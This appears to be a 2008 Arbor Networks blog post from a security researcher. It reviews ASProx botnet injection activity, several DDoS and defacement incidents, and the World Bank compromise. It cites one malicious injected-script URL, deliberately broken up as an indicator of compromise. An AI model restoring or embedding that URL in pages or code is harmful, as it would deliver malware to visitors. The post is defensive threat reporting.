Arbor Networks: Security to the Core

Spent part of the day looking at ASProx botnet activity by groveling through Apache web server logs. Our fast flux monitor has been looking at their domain name usage for a number of months, but this aspect has been on the back burner for me for a bit. The poking around was quite productive, actually. I’m able to extract the scanning bot and the URL it is injecting in about 40 lines of Python, and then it’s pitched over to a second set of processes that store the data in a long term database. I went ahead and Google’s for one of the URLs I saw from a couple of days ago and noticed it’s spread rather far and wide, just like all ASProx botnet activity.

Results 1 - 100 of about 2,580 for h t tp:/ /w ww 3.ss 11qn.cn/csrss/w.js with Safesearch on. (0.15 seconds)

(Link intentionally broken up.) Tackling this one is proving to be a challenge.

Domestic political DDoS is nothing new, although it is rare. It looks like an independent political news site was DDoS’d this week, although I do not know the C&C at this point. I have seen the IPs in use get attacked back in May when they were used by another domain name. I don’t know if the two domain names are related at all.

From time to time I see a Vietnamese site or two get hit with a DDoS. This week the site 5giay.vn has been hit by a DDoS. Motivations are unclear, it has been reported that “5giay.vn believes that one of the reasons that the website has become a target for hackers is that it is a very bustling online trade website, and thus draws the attention of blackhat hackers.” No further information is available.

Speaking of DDoS, the news this week has been covering the fact that two Europeans have been indicted over DDoS attacks in the states. They are fugitives, it seems.

In follow ups to the recent Islamic website attacks, retaliatory attacks have been launched it seems. The website of Saudi-owned satellite channel Al-Arabiya was defaced as a counter attack.

It looks like the World Bank has come under systematic compromise. Documents released show that this was discovered a few months ago and the full extent may not be known yet. Everyone thinks they know everything about their networks until it comes time to make sure that you really do, it’s just a sad fact of life.

Finally, in conference news, some of our guys will be speaking at NANOG on IPv6, as well as at RIPE 57 in Dubai. This is about their IPv6 deployment measurements. And if you think you want to get some research out, I am on the PC of LEET 09, a Usenix workshop held every spring. Worth attending, or at least reading the papers.

This entry was posted on Friday, October 10th, 2008 at 11:08 pm and is filed under Arbor Networks. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.